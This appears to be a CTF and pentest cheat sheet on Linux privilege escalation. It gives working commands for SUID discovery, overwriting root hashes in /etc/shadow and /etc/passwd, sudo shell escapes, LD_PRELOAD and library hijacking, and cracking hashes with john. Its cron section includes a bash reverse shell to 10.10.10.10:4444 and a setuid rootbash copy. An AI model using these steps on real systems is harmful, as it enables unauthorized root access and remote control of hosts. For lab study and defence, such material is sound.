Most Common Privilege Escalation Methods in Linux

Common Linux Privesc

1. Enumeration

• LinEnum : Simple Bash Script that performs common commands related to privilege escalation & enumertaes the user privileges

• LinPeas : LinPEAS is a script that search for possible paths to escalate privileges on Linux/Unix*/MacOS hosts. The checks are explained on book.hacktricks.xyz

• Script : You can find the script at LinuEnum and LinPeas

OR

• Raw

2. Abusing SUID/GUID Files

• SUID/GUID : These are files with special permissions. People allowed can execute these files as owner of the file

• Finding SUID Binaries : Simple find command can help you with that

For Bash:

1

find / -perm -u=s -type f 2>/dev/null

For Zsh:

1

find / -perm /4000 -type f 2>/dev/null

3. Exploiting Writeable /etc/passwd

• Format : The entries of users in /etc/passwd follows a specific format;

  1	test:x:0:0:root:/root:/bin/bash

  1. Username: It is used when user logs in. It should be between 1 and 32 characters in length.
  2. Password: An x character indicates that encrypted password is stored in /etc/shadow file. Please note that you need to use the passwd command to compute the hash of a password typed at the CLI or to store/update the hash of the password in /etc/shadow file, in this case, the password hash is stored as an “x”.
  3. User ID (UID): Each user must be assigned a user ID (UID). UID 0 (zero) is reserved for root and UIDs 1-99 are reserved for other predefined accounts. Further UID 100-999 are reserved by system for administrative and system accounts/groups.
  4. Group ID (GID): The primary group ID (stored in /etc/group file)
  5. User ID Info: The comment field. It allow you to add extra information about the users such as user’s full name, phone number etc. This field use by finger command.
  6. Home directory: The absolute path to the directory the user will be in when they log in. If this directory does not exists then users directory becomes /
  7. Command/shell: The absolute path of a command or shell (/bin/bash). Typically, this is a shell. Please note that it does not have to be a shell.

How to exploit a writable /etc/passwd

It’s simple really, if we have a writable /etc/passwd file, we can write a new line entry according to the above formula and create a new user! We add the password hash of our choice, and set the UID, GID and shell to root. Allowing us to log in as our own root user!

4. Escaping Vi Editor

• Sudo -l

Every time you have access to an account during a CTF scenario, you should use sudo -l to list what commands you’re able to use as a super user on that account.

Assume that /bin/vi was given permission to be run as root

• all we need to do is open vi as root, by typing “sudo vi” into the terminal.
• type :!sh to open a shell!

Misconfigured Binaries and GTFOBins

If you find a misconfigured binary during your enumeration, or when you check what binaries a user account you have access to can access, a good place to look up how to exploit them is GTFOBins. GTFOBins is a curated list of Unix binaries that can be exploited by an attacker to bypass local security restrictions. It provides a really useful breakdown of how to exploit a misconfigured binary and is the first place you should look if you find one on a CTF or Pentest.

5. Exploiting Crontab

• What is Cron?

  The Cron daemon is a long-running process that executes commands at specific dates and times. You can use this to schedule activities, either as one-time events or as recurring tasks. You can create a crontab file containing commands and instructions for the Cron daemon to execute.

• How to view what Cronjobs are active.

  We can use the command “cat /etc/crontab” to view what cron jobs are scheduled.

• Format of a Cronjob

  Cronjobs exist in a certain format, being able to read that format is important if you want to exploit a cron job.

1
2
3
4
5
6
7
8
9
10
11

# = ID

m = Minute

h = Hour

dom = Day of the month

mon = Month

dow = Day of the week

user = What user the command will run as

command = What command should be run

1
2
3

#  m   h dom mon dow user  command

17 *   1  *   *   *  root  cd / && run-parts --report /etc/cron.hourly

• How Can We Exploit This?

  Some Times you will find some cron jobs running which are not default and if you can write to those files, then many things can be done including creating a SUID binary that gives root bash or a reverse root shell connecting back to us.

Remember, you need to run the root bash SUID binary with -p option enabled

6. Exploiting PATH Variable

• What is PATH?

 PATH is an environmental variable in Linux and Unix-like operating systems which specifies directories that hold executable programs. When the user runs any command in the terminal, it searches for executable files with the help of the PATH Variable in response to commands executed by a user.

It is very simple to view the Path of the relevant user with help of the command **`echo $PATH`**.

• How does this let us escalate privileges?

  Let’s say we have an SUID binary. Running it, we can see that it’s calling the system shell to do a basic process like list processes with “ps”. Unlike in our previous SUID example, in this situation we can’t exploit it by supplying an argument for command injection, so what can we do to try and exploit this?

  We can re-write the PATH variable to a location of our choosing! So when the SUID binary calls the system shell to run an executable, it runs one that we’ve written instead!

  As with any SUID file, it will run this command with the same privileges as the owner of the SUID file! If this is root, using this method we can run whatever commands we like as root!

Linux PrivEsc

1. Service Exploits

Assuming a scenario where the MySQL service is running as root and the “root” user for the service does not have a password assigned, We can use a popular exploit that takes advantage of User Defined Functions (UDFs) to run system commands as root via the MySQL service.

2.Weak File Permissions - Readable /etc/shadow

Each line of the file represents a user. A user’s password hash (if they have one) can be found between the first and second colons (:) of each line.

Save the root user’s hash to a file called hash.txt on your Kali VM and use john the ripper to crack it. You may have to unzip /usr/share/wordlists/rockyou.txt.gz first and run the command using sudo depending on your version of Kali:

1

john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt`

3.Weak File Permissions - Writable /etc/shadow

The /etc/shadow file contains user password hashes and is usually readable only by the root user.

Assuming that due to misconfigurations the /etc/shadow file on the target is world-writable:

1

ls -l /etc/shadow`

Generate a new password hash with a password of your choice:

1

mkpasswd -m sha-512 newpasswordhere`

Edit the /etc/shadow file and replace the original root user’s password hash with the one you just generated.

Switch to the root user, using the new password:

1

su root`

4. Weak File Permissions - Writable /etc/passwd

The /etc/passwd file contains information about user accounts. It is world-readable, but usually only writable by the root user. Historically, the /etc/passwd file contained user password hashes, and some versions of Linux will still allow password hashes to be stored there.

Note that the /etc/passwd file is world-writable (again due to misconfs, an assumption):

1

ls -l /etc/passwd`

Generate a new password hash with a password of your choice:

1

openssl passwd newpasswordhere`

Edit the /etc/passwd file and place the generated password hash between the first and second colon (:) of the root user’s row (replacing the “x”).

Switch to the root user, using the new password:

1

su root`

Alternatively, copy the root user’s row and append it to the bottom of the file, changing the first instance of the word “root” to “newroot” and placing the generated password hash between the first and second colon (replacing the “x”).

Now switch to the newroot user, using the new password:

1

su newroot`

5. Sudo - Shell Escape Sequences

List the programs which sudo allows your user to run:

1

sudo -l`

Visit GTFOBins (https://gtfobins.github.io) and search for some of the program names. If the program is listed with “sudo” as a function, you can use it to elevate privileges, usually via an escape sequence.

Choose a program from the list and try to gain a root shell, using the instructions from GTFOBins.

For an extra challenge, try to gain a root shell using all the programs on the list!

6. Sudo - Environment Variables

Sudo can be configured to inherit certain environment variables from the user’s environment.

Check which environment variables are inherited (look for the env_keep options):

1

sudo -l

In our case, we assume that LD_PRELOAD and LD_LIBRARY_PATH are both inherited from the user’s environment. LD_PRELOAD loads a shared object before any others when a program is run. LD_LIBRARY_PATH provides a list of directories where shared libraries are searched for first.

Create a shared object using the code located at /home/user/tools/sudo/preload.c:

1

gcc -fPIC -shared -nostartfiles -o /tmp/preload.so /home/user/tools/sudo/preload.c

Run one of the programs you are allowed to run via sudo (listed when running sudo -l), while setting the LD_PRELOAD environment variable to the full path of the new shared object:

1

sudo LD_PRELOAD=/tmp/preload.so program-name-here

A root shell should spawn. Exit out of the shell before continuing. Depending on the program you chose, you may need to exit out of this as well.

Run ldd against the apache2 program file to see which shared libraries are used by the program:

1

ldd /usr/sbin/apache2

Create a shared object with the same name as one of the listed libraries (libcrypt.so.1) using the code located at /home/user/tools/sudo/library_path.c:

1

gcc -o /tmp/libcrypt.so.1 -shared -fPIC /home/user/tools/sudo/library_path.c

Run apache2 using sudo, while settings the LD_LIBRARY_PATH environment variable to /tmp (where we output the compiled shared object):

1

sudo LD_LIBRARY_PATH=/tmp apache2

A root shell should spawn. Exit out of the shell. Try renaming /tmp/libcrypt.so.1 to the name of another library used by apache2 and re-run apache2 using sudo again. Did it work? If not, try to figure out why not, and how the library_path.c code could be changed to make it work.

7.Cron Jobs - File Permissions

View the contents of the system-wide crontab:

1

cat /etc/crontab

There should be two cron jobs scheduled to run every minute. One runs overwrite.sh, the other runs /usr/local/bin/compress.sh.

Locate the full path of the overwrite.sh file:

1

locate overwrite.sh

Note that the file is world-writable:

1

ls -l /usr/local/bin/overwrite.sh

Replace the contents of the overwrite.sh file with the following after changing the IP address to that of your Kali box.

1
2

#!/bin/bash
bash -i >& /dev/tcp/10.10.10.10/4444 0>&1

Set up a netcat listener on your Kali box on port 4444 and wait for the cron job to run (should not take longer than a minute). A root shell should connect back to your netcat listener.

1

nc -nvlp 4444

View the contents of the system-wide crontab:

1

cat /etc/crontab

Note that the PATH variable starts with /home/user which is our user’s home directory.

Create a file called overwrite.sh in your home directory with the following contents:

1
2
3
4

#!/bin/bash

cp /bin/bash /tmp/rootbash
chmod +xs /tmp/rootbash

Make sure that the file is executable:

1

$ chmod +x /home/user/overwrite.sh

Wait for the cron job to run (should not take longer than a minute). Run the /tmp/rootbash command with -p to gain a shell running with root privileges:

1

$ /tmp/rootbash -p`

Happy Hacking 😃!